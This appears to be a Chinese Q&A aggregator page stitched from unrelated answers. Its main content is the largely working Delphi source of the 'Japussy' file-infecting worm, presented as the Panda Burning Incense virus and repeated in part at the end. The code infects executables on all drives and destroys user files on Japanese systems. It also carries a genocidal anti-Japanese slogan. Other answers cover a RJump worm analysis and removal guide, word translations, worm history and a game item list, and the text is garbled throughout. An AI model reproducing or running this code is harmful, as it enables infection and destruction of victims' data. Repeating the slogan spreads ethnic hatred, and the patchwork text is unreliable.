wormbase(wormbase.org)

更新时间:2023-03-01 00:11:07 阅读: 评论:0

电脑病毒熊猫烧香代码

是部分代码!
program Japussy;
us
Windows, SysUtils, Class, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOfft = $12EB8; //PE文件主图标的偏移量

//在Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量

{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOfft = $92BC; //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主图标的大小--744字节
IconTail = IconOfft + IconSize; //PE文件主图标的尾部
//垃圾码,以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = Fal; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := Fal;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpRerved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbRerved2 := 0;
Si.lpRerved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
Exit;
Infected := Fal;
IsPE := Fal;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //检查PE文件头
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //检查感染标记
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主图标(744字节),存入流
aIcon.ReleaHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//头文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//写入病毒体主图标之前的数据
CopyStream(HdrStream, 0, DstStream, 0, IconOfft);
//写入目前程序的主图标
CopyStream(IcoStream, 22, DstStream, IconOfft, IconSize);
//写入病毒体主图标到病毒体尾部之间的数据
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//写入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//写入已感染的标记
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替换宿主文件
DstStream.Free;
end;
except;
end;
end;

{ 将目标文件写入垃圾码后删除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只读属性
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0;
Randomize;
Max := Random(15); //写入垃圾码的随机次数
if Max < 5 then
Max := 5;
Mass := Size div Max; //每个间隔块的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClo(FileHandle); //关闭文件
end;
DeleteFile(PChar(FileName)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + ':';
DiskType := GetDriveType(PChar(Str));
//得到本地磁盘和网络盘
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 0 //不是目录
el if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 1 //不是根目录
el Result := 2; //是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCa(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可执行文件
end
el if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件,将Ba64编码后的病毒写入
//感染浏览此网页的所有用户

end
el if Ext = '.WAB' then //Outlook地址簿文件
begin
//获取Outlook邮件地址
end
el if Ext = '.ADC' then //Foxmail地址自动完成文件
begin
//获取Foxmail邮件地址
end
el if Ext = 'IND' then //Foxmail地址簿文件
begin
//获取Foxmail邮件地址
end
el
begin
if IsJap then //是倭文操作系统
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClo(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClo(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings[i] + '', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;

var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可写的磁盘列表
Len := Length(DriverList);
while True do //死循环
begin
for i := Len downto 1 do //遍历每个磁盘驱动器
LoopFiles(DriverList[i] + ':', '*.*'); //感染之
SendMail; //发带毒邮件
Sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
el //WinNT
begin
//远程线程映射到Explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和发邮件
el //已寄生于宿主程序上了,开始工作
begin
TmpFile := ParamStr(0); //创建临时文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格
ExtractFile(TmpFile); //分离之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //创建新进程运行之
InfectFiles; //感染和发邮件
end;
end.

这是什么病毒?

病毒名称:Worm.Win32.RJump.a(AVP)
病毒别名:Trojan.Spy.IeSpy.q(瑞星)
病毒大小:3,515,723 字节
加壳方式:无
样本MD5:3efdfddfffe5cf4ad40c5368c336a702
发现时间:2006.5.19
更新时间:2006.6.1
关联病毒:
传播方式:通过U盘、移动硬盘、MP3等
中毒特征:生成RavMonE.exe、RavMoneE.exe.log、RavMonlog
病毒简介:用PYTHON语言编写,py2exe打包
变种特征:RavMon.exe、AdobeR.exe

技术分析
==========
1. 运行后生成
windows\RavMonE.exe(3,515,723 字节)——病毒本身
msvcr71.dll(348,160字节)——库文件,支持病毒运行
RavMoneE.exe.log(644字节)
RavMonlog(5字节)
Autorun.inf(103字节)

2. 添加注册表

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RavAV" = "windows\RavMonE.exe"

3. Autorun.inf内容:
[AutoRun]
open=RavMonE.exe e
shellexecute=RavMonE.exe e
shell\Auto\command=RavMonE.exe e
shell=Auto
用来启动RavMonE.exe

4. RavMoneE.exe.log内容:
Traceback (most recent call last):
File "RavMonE.py", line 1, in ?
File "zipextimporter.pyo", line 78, in load_module
File "twisted\internet\reactor.pyo", line 12, in ?
File "twisted\internet\lectreactor.pyo", line 182, in install
File "twisted\internet\posixba.pyo", line 168, in _init_
File "twisted\internet\ba.pyo", line 268, in _init_
File "twisted\internet\ba.pyo", line 568, in _initThreads
File "twisted\internet\posixba.pyo", line 265, in installWaker
File "twisted\internet\posixba.pyo", line 77, in _init_
File "", line 1, in listen
socket.error: (10022, 'Invalid argument')

5. RavMonlog内容:
16704 17608 类似的数字

===
清除方法:

1. ctrl+alt+del,打开任务管理器,结束RavmonE.exe进程。

2. 在开始菜单>>>运行>>>输入regedit,删除注册表的键值
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
C:\WINDOWS\RavMonE.exe
一切OK。

3. 删除windows\RavMonE.exe、msvcr71.dll、RavMoneE.exe.log、RavMonlog。

4. 打开“文件夹选项”,在“查看”选项卡中,去掉“隐藏受保护的操作系统文件”前的勾,同时选中“显示所以文件和文件夹”。

5. 用右键打开U盘(不要双击打开),删除包括RavmonE.exe、msvcr71.dll、RavMoneE.exe.log、RavMonlog、autorun.inf。

6.将你电脑上的 [移动硬盘H:] 重命名叫什么都行,先叫着将U盘安全拔出后再把命名改回去文件选项也选回去,就可以了。

注:RavMon.exe和AdobeR.exe的清除方法类似。
PS:msvcr71.dll是用来支持病毒本身运行的,删除的时候请注意文件生成时间是否与病毒生成的时间一致。

用了以上的方法,终于把它彻底清理干净了!!

以后,又要注意防毒!(我为什么要说又?)

请给我解释一下这几个单词?

1.handle
n.柄,把手,把柄,口实,手感
vt.触摸,运用,买卖,处理,操作
vi.搬运,易于操作
n.[计]句柄

2.fddder tray
这个你可能写错了吧!
tray是盘,碟,盘子的意思!前面那个就不清楚

3.worm drive sleeve
worm虫,蠕虫,蠕行,慢慢前进
drive驾驶,开车,飞跑
sleeve袖子

4.worm drive
同上

5.mincing
adj.装腔作势的
v.切碎

6.coar mincing blade
coar粗糙的,粗鄙的
blade刀片,刀刃

7.fine mincing blade
fine
adj.美好的,优良的,杰出的,纤细
n.罚款,罚金,晴天,精细
vt.罚款,精炼,澄清
vi.变清,变细
adv.<口>很好,妙

8.blade cover bezel
cover盖子,封面,覆盖,掩护
bezel宝石的斜面,凿的刃角

9.locking device
locking关闭,锁闭
device装置,设计,图案

10.non slip ba
non不,非
slip滑倒,事故
ba底部,基础,以...作基础

11.locking device key
locking key制动键,锁闭钥匙

12.easy to clean
easy容易的,安逸的,舒适的
clean清洁的,干净的

13.special ba
special特派员,专车,专门的,转用的

蠕虫病毒为什么带来网络赌塞?

主要原因还是蠕虫病毒的自我复制及无限循环理论,摘抄一篇文章给你看看,希望有所帮助: 1 (1)传染方式多。蠕虫病毒入侵网络的主要途径是通过工作站传播到服务器硬盘中,再由服务器的共享目录传播到其他的工作站。但蠕虫病毒的传染方式比较复杂。 (2)传播速度快。在单机上,病毒只能通过软盘从一台计算机传染到另一台计算机,而在网络中则可以通过网络通信机制,借助高速电缆进行迅速扩散。 (3)清除难度大。在单机中,再顽固的病毒也可通过删除带毒文件、低级格式化硬盘等措施将病毒清除。而网络中只要有一台工作站未能杀毒干净就可能使整个网络重新全部被病毒感染,甚至刚刚完成杀毒工作的一台工作站马上就能被网上另一台工作站的带毒程序所传染,因此,仅对工作站进行病毒杀除不能彻底解决网络蠕虫病毒的问题。 (4)破坏性强。网络中蠕虫病毒将直接影响网络的工作状态,轻则降低速度,影响工作效率;重则造成网络系统的瘫痪,破坏服务器系统资源,使多年的工作毁于一旦。 2 一、蠕虫病毒具有自我复制能力 二、蠕虫病毒具有很强的传播性 三、蠕虫病毒具有一定的潜伏性 四、蠕虫病毒具有特定的触发性 五、蠕虫病毒具有很大的破坏性 最早的网络蠕虫病毒作者是美国的小莫里思,他编写的蠕虫病毒是在美国军方的局域网内活动,但是,必需事先获取局域网的权限和口令。 世界性的第一个大规模在Internet网上传播的网络蠕虫病毒是1998年底的Happy99网络蠕虫病毒,当你在网上向外发出信件时,HAPPY99网络蠕虫病毒会顶替你的信件或随你的信件从网上跑到你发信的目标出,到了1月1日,收件人一执行,便会在屏幕上不断暴发出绚丽多彩的礼花,机器就不在干什么了。 1999年3月欧美暴发了“美丽杀”网络蠕虫宏病毒,欧美最大的一些网站频频遭受到堵塞,造成巨大经济损失。 2000年至今,是网络蠕虫开始大闹互联网的发展期。 2000年,在欧美还暴发了I-WORM/Love Letter“爱虫”网络蠕虫病毒,又使欧美最大的一些网站和企业及政府的服务器频频遭受到堵塞和破坏,造成了比“美丽杀”病毒破坏还大的经济损失。目前,该病毒以有十多种变种产生,不断的到处破坏。 2001后,有更多的网络蠕虫出现。 I-WORM.NAVIDAD网络蠕虫。该病毒能引发大规模的邮件泛滥。其传播机制不同于一般的网络蠕虫程序(如爱虫、美丽公园等),该网络蠕虫程序具有较大的迷惑性:用户通过OUTLOOK EXPRESS 收到的是一封来自你曾经发送过的人的回复信件,内容与您发送的完全一致,邮件的主题、邮件的正文都一样,只是增加了一个电子邮件的附件,该附件的文件名称是:NAVIDAD.EXE文件,文件的大小是:32768字节。该附件就是该网络蠕虫程序的主体文件。该邮件只是在微软的OUTLOOK EXPRESS邮件系统下自动传播,它会自动地给您的收件箱(而不是地址簿)的所有人发送一份该网络蠕虫程序。 由于病毒修改该注册表项目的文件名称的错误,WINDOWS系统在启动,读取可执行EXE文件时,会因为找不到WINSVRC.EXE文件而不能正常启动WINDOWS 系统。 I_WORM.Blebla.B网络蠕虫。该病毒是通过电子邮件的附件来发送的,文件的名称是:xromeo.exe 和xjuliet.chm,该蠕虫程序的名称由此而来。 当用户在使用OE阅读信件时,这两个附件自动被保存、运行。 当运行了该附件后, 该蠕虫程序将自身发送给OUTLOOK地址薄里的每一个人,并将信息发送给alt.comp.virus 新闻组。该蠕虫程序是以一个EMAIL附件的形式发送的,信件的主体是以HTML语言写成的,并且含有两个附件:xromeo.exe及xjuliet.chm.收件人本身看不见什么邮件的内容。 该蠕虫程序的危害性还表现在它还能修改注册表一些项目,使得一些文件的执行,必须依赖该蠕虫程序生成的在WINDOWS目录下的SYSRNJ.EXE文件,由此可见对于该病毒程序的清除不能简单的将蠕虫程序删除掉,而必需先将注册表中的有关该蠕虫的设置删除后,才能删除这些蠕虫程序。 I_WORM/EMANUEL网络蠕虫。该病毒通过MICROSOFT的OUTLOOK EXPRESS来自动传播给受感染计算机的地址薄里的所有人,给每人发送一封带有该附件的邮件。该网络蠕虫长度16,896-22000字节,有多个变种。 在用户执行该附件后,该网络蠕虫程序在系统状态区域的时钟旁边放置一个“花”一样的图标,如果用户点击该"花"图标,会出现一个消息框,大意是不要按此按钮.如果按了该按钮的话,会出现一个以Emmanuel为标题的信息框, 当您关闭该信息框时又会出现一些别的:诸如上帝保佑您的提示信息. 还有一个网络蠕虫I-Worm/Hybris的最明显的特征是, 当您打开带有该网络蠕虫程序的附件时, 您的计算机的屏幕就会被一个始终位于最上方的图象所覆盖,该图象是活动的、转动的、黑白相见的螺旋状的圆形图形。 该网络蠕虫程序与其他常见的网络蠕虫程序一样,是通过网络上的电子邮件系统OUTLOOK来传播的, 同样是修改WINDOWS系统下的主管电子邮件收发的文件wsock32.dll文件。它与别的网络蠕虫程序的不同之处在于它不断可以通过网络自动发送网络蠕虫程序本身,而且发送的文件的名称是变化的。 该病毒是世界上第一个可自我将病毒体分解成多个大小可变化的程序块(插件),分别潜藏计算机内的不同位置,以便躲避查毒软件。该病毒具有将这些碎块聚合成一个完整的病毒,再进行传播和破坏。早在1997年王江民先生在〈〈计算机病毒的发展趋势与对抗手段〉〉一文中就有一段话预言会有这种病毒出现。 I_WORM/HTML.Little Davinia网络蠕虫。这是一个破坏性极大的网络蠕虫,可以清除硬盘上的所有数据,它利用WORD2000的漏洞、EMAIL等来传播。该网络蠕虫程序是复合型的, 是HTML(网页语言)形式的、VBS文件结构、带有宏的网络蠕虫程序。 该病毒还能修改系统的注册表,一旦修改注册表成功,该病毒就会自动搜索所有的本地硬盘、网络盘、以及所有目录下的文件,采用覆盖的方式将发现的文件写上一些含有一些杂乱信息的文字,被损坏的文件很难修复! I_WORM.MTX网络蠕虫病毒已大面积传播, 超过了CIH的感染率,但破坏性没CIH大。 它是一个变形病毒, 变化无穷。该网络蠕虫的邮件比较特殊,它没有主题、正文,只有一个附件文件,附件的文件名是变化的。 I-WORM.AnnaKournikova网络蠕虫程序是使用了一个病毒制造机程序VBSWG制造并加密。该蠕虫程序发送的邮件的附件是: AnnaKournikova.jpg.vbs(俄罗斯体育选手的名称命名的文件名称),它是一个VBS程序文件。当邮件用户不小心执行了该附件,那么该网络蠕虫程序会给OUTLOOK地址薄里的所有人发送一份该网络蠕虫程序,邮件的附件文件名称: AnnaKournikova.jpg.vbs(俄罗斯网球女明星的图片文件) 该网络蠕虫程序的长度是2853字节左右。 如果机器的日期是1月26日的话,该网络蠕虫程序会自动将您指向一个位于荷兰的计算机商店的网络地址。 该网络蠕虫程序会给所有地址薄里的所有用户发送网络蠕虫程序来看,它和轰动一时的“爱虫程序”有相似之处。 I-Worm.Magistr网络蠕虫恶性病毒可通过互联网上电子邮件或在局域网内进行传播。可通过Outlook、Netscape Mesnger等其他电子邮件软件和新闻组在内的软件读取其中地址簿中的地址发送带毒电子邮件进行传播。 该病毒随机在当前机上找一个.EXE或.SCR文件和一些.DOC或.TXT文件作为附件发出去,如果你的机中.DOC或.TXT文件是机密文件,肯定会被发在互联网上到处都是。 目前,该病毒已有许许多多的变种。病毒发作时间是在病毒感染系统一个月后。病毒会改写本地机和局域网中电脑上的文件,文件内容全部被改写,这将导致文件不能恢复! 如果在WIN9X环境下,该病毒会象CIH病毒一样,破坏BIOS和清除硬盘上的数据,是危害性一非常大的一种病毒。 该病毒采用了多变形引擎和两组加密模块,病毒感染文件的中部和尾部,将中部的原文件部分代码加密后潜藏在病毒体内,病毒长为24000-30000字节。 病毒使用了非常复杂的感染机制,感染.EXE、.DLL、.OCX、.SCR、.CPL等文件,病毒每传染一个目标,就变化一次,具有无穷次变化,其目的是使反病毒软件难以发现和清除。 病毒在发展,网络在发展,网络又促进了病毒的发展,复杂的病毒又超着变形病 蠕虫病毒的一般防治方法是:使用具有实时监控功能的杀毒软件,并且注意不要轻易打开不熟悉的邮件附件。 蠕虫病毒主要具备以下特点。 1.较强的独立性 从某种意义上来讲,蠕虫病毒开辟了计算机病毒传播和破坏能力的"新纪元"。我们在前一章讲到的传统计算机病毒一般都需要宿主程序,病毒将自己的代码写到宿主程序中,当该程序运行时先执行写入的病毒程序,从而造成感染和破坏。而蠕虫病毒不需要宿主程序,它是一段独立的程序或代码,因此也就避免了受宿主程序的牵制,可以不依赖于宿主程序而独立运行,从而主动地实施攻击。 2.利用漏洞主动攻击 由于不受宿主程序的限制,蠕虫病毒可以利用操作系统的各种漏洞进行主动攻击。"尼姆达"病毒利用了IE浏览器的漏洞,使感染了病毒的邮件附件在不被打开的情况下就能激活病毒;"红色代码"利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播;而蠕虫王病毒则是利用了微软数据库系统的一个漏洞进行攻击。 3.传播更快更广 蠕虫病毒比传统病毒具有更大的传染性,它不仅仅感染本地计算机,而且会以本地计算机为基础,感染网络中所有的服务器和客户端。蠕虫病毒可以通过网络中的共享文件夹、电子邮件、恶意网页以及存在着大量漏洞的服务器等途径肆意传播,几乎所有的传播手段都被蠕虫病毒运用得淋漓尽致,因此,蠕虫病毒的传播速度可以是传统病毒的几百倍,甚至可以在几个小时内蔓延全球,造成难以估量的损失。 我们可以做一个简单的计算:如果某台被蠕虫感染的计算机的地址簿中有100个人的邮件地址,那么病毒就会自动给这100个人发送带有病毒的邮件,假设这100个人中每个人的地址簿中又都有100个人的联系方式,那很快就会有100 100 = 10 000个人感染该病毒,如果病毒再次按照这种方式传播就会再有100 100 100 1 000 000个人感染,而整个感染过程很可能会在几个小时内完成。由此可见,蠕虫病毒的传播速度非常惊人。 4.更好的伪装和隐藏方式 为了使蠕虫病毒在更大范围内传播,病毒的编制者非常注重病毒的隐藏方式。 在通常情况下,我们在接收、查看电子邮件时,都采取双击打开邮件主题的方式浏览邮件内容,如果邮件中带有病毒,用户的计算机就会立刻被病毒感染。因此,通常的经验是:不运行邮件的附件就不会感染蠕虫病毒。但是,目前比较流行的蠕虫病毒将病毒文件通过ba64编码隐藏到邮件的正文中,并且通过mine的漏洞造成用户在单击邮件时,病毒就会自动解码到硬盘上并运行。 通过在邮件系统中查看邮件的全部信息,可以看到邮件中会隐藏着name "news_doc.doc.scr"等信息(如图5-2所示)。图中下方的大量编码就是实际的病毒体文件,这些编码会在用户单击后生成news_doc.doc.scr并运行。这样一来,用户在单击邮件主题进行预览时,就会在不知不觉中"中招"。 此外,诸如Nimda和求职信(Klez)等病毒及其变种还利用添加带有双扩展名的附件等形式来迷惑用户,使用户放松警惕性,从而进行更为广泛的传播。 5.技术更加先进 一些蠕虫病毒与网页的脚本相结合,利用VB Script、Java、ActiveX等技术隐藏在HTML页面里。当用户上网浏览含有病毒代码的网页时,病毒会自动驻留内存并伺机触发。还有一些蠕虫病毒与后门程序或木马程序相结合,比较典型的是"红色代码病毒",它会在被感染计算机Web目录下的\scripts下将生成一个root.exe后门程序,病毒的传播者可以通过这个程序远程控制该计算机。这类与黑客技术相结合的蠕虫病毒具有更大的潜在威胁。

下了一个僵尸毁灭工程物品修改器,都是英文,看不懂,找盒钉子都找不到,哪位大侠可以把所有物品都翻译过

翻译?我翻译了个不太全面的,但起码杀差不多了,跟着“|”符号的,就是这种物品有很多种贴图或名字,例如Crisps1和Crisps2是两种不同的贴图。记得要加前缀,比如薯片(Crisps)刷物品时要加Ba,变成Ba.Crisps,有三种前缀,像能种出来的食物,要加farming前缀。

MortarPestle 研体
WildGarlic 野生大蒜
Plantain 车前草
Comfrey 紫色草药 Cataplasm 药膏(加在草药后面可以敷在伤口上)
LemonGrass 柠檬草
BlackSage 黑鼠尾草
CommonMallow 普通锦葵植物
Ginng 人参
GrapeLeaves 葡萄叶
Violets 紫罗兰花瓣
Rohips 玫瑰果
MushroomGeneric 1234567 4有毒 蘑菇
BerryGeneric 12345 2是有毒 浆果
BerryPoisonIvy “有毒”的浆果
BerryBlue|Black 蓝|黑莓
farming.HandShovel 手铲
farming.GardeningSprayFull 园艺喷壶(满)
farming.Potato 土豆
farming.Tomato 番茄 BagSeed 一包种子,加在后面可以刷出种子,例如farming.TomatoBagSeed

Fertilizer 肥料
Screwdriver 螺丝刀
Sledgehammer 大铁锤
HutingKnife 猎刀
Hammer 铁锤
Pan 平底煎锅
Woodglue 木胶
DuctTape 管道胶带
Glue 胶水
Scotchtape 胶带
-----------------------------------
Antibiotics 抗生素
AlcoholedCottonBalls 酒精棉球
bandage 绷带
RippedSheets 破布
Pills 止痛药
PillsVitamins 维他命
pillsAntiDep 抗忧郁药
PillsSleepingTablets 安眠药
PillsBeta β-阻断剂
WhiskeyFull 威士忌
Wine 夏墩埃酒
Bleach 漂白
Pot 铁锅
WaterPot 装满水的铁锅
WaterPopBottle 装满水的水瓶
Rice 米
Ramen 拉面
BeefJerky 牛肉干
Pickles 泡菜
JuiceBox 果汁盒
Crisps 1234 薯片
CookieJelly 果冻蛋糕
Cereal 妙脆角
Popcorn 爆米花
Chocolate 巧克力
Pop 123 汽水
Cupcake 纸杯蛋糕
Modjeska 硬糖
Candycane 糖果棒
ChickenFried 炸鸡
Pizza 披萨
Pancake 煎饼
GrilledChee 奶酪三明治
Burger 汉堡
Waffles 烤松饼
Corn 玉米
Orange 橙子
Carrots 萝卜
Cabbage 卷心菜
Leek 韭菜
BellPepper 甜椒
Broccoli
Chee 奶酪
Pepper 胡椒粉
Mustard 芥末
Butter 黄油
Honey 蜂蜜
Mugfulll
Ketchup 番茄酱
PeanutButter 花生酱 Sandwich 三明治
Peanut 花生
SunflowerSeeds 瓜子
Pie 派
Salt 盐
Sugar 糖
Broccoli
Dough 面团
PieWholeRaw 生面团
CakeRaw 生蛋糕
Macandchee
DoughRolled 擀过的面团
BakingTrayBread 自己烘烤的面包
TinOpener 开罐器
TinnedSoup 罐装汤
TunaTin 罐装金枪鱼
CannedChili
CannedBologne
CannedSardines
CannedCorn 罐装玉米
CannedPeas 罐装豆子
CannedTomato2 罐装西红柿
CannedPotato2 罐装马铃薯
CannedSardines 罐装沙丁鱼
CannedCarrots2 罐装萝卜
CannedCornedBeef 罐装腌牛肉
CannedMushroomSoup 罐装真菌汤
CannedBologne 罐装
CannedChili 罐装坚果
OatsRaw 罐装燕麦
EggCarton 蛋盒
CandyPackage 棒棒糖袋
Pineapple 菠萝
DeadRat 死田鼠
DeadSquirrel 死松鼠
Frog 青蛙
FishingTackle 假饵 12
Catfish 鲇鱼
Bass 岩钝鲈鱼 可切片
Perch 鲈鱼
Crappie
Panfish 翻车鱼
Pike 白斑狗鱼
Trout 鳟鱼
BaitFish 小鱼
WildEggs 野鸡蛋
Vinegar 食醋
Worm 蚯蚓
Cricket 蟋蟀
Grasshopper 蚂蚱
NailsBox 钉盒
Glue 胶水
Rope 绳子
Twine 细绳
DuctTape 粘合胶带
------------------------
BigHikingBag 大型登山包
Pistol 手枪
Shotgun 霰弹枪
HuntingRifle 猎枪
VarmintRifle 狩猎步枪
Molotov 燃烧弹
Bullets9mm 9mm子弹
ShotgunShells 霰弹枪子弹
223Bullets .223子弹
308Bullets .308子弹
BulletsBox 9mm子弹盒
ShotgunShellsBox 霰弹枪子弹盒
223Box .233子弹盒
308box .308子弹盒
IronSight 铁瞄准器
x2Scope 2倍狙击 x4 x8
AmmoStraps 子弹挂件
Sling 背带
FiberglassStock 枪托
RecoilPad 后座缓冲垫
Lar 激光瞄准器
RedDot 红点瞄准器
ChokeTubeFull 消焰管
ChokeTubeImproved 改良的消焰管
---------------------------------
CrodlessPhone 无绳电话
Generator 发电机
SmokeBomb 烟雾弹
PipeBomb 管状炸药
FlarmTrap 燃烧弹
PetrolCan 汽油桶
EmptyPetrolCan 空汽油桶
PropaneTank 煤气罐
Charcoal 木炭


病毒什么样子?什么颜色?几个嘴?

下面是熊猫病毒的核心代码,就是几个英文字母的集合

program japussy;
us
windows, sysutils, class, graphics, shellapi{, registry};
const
headersize = 82432; //病毒体的大小
iconofft = $12eb8; //pe文件主图标的偏移量

//在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量

{
headersize = 38912; //upx压缩过病毒体的大小
iconofft = $92bc; //upx压缩过pe文件主图标的偏移量

//upx 1.24w 用法: upx -9 --8086 japussy.exe
}
iconsize = $2e8; //pe文件主图标的大小--744字节
icontail = iconofft + iconsize; //pe文件主图标的尾部
id = $44444444; //感染标记

//垃圾码,以备写入
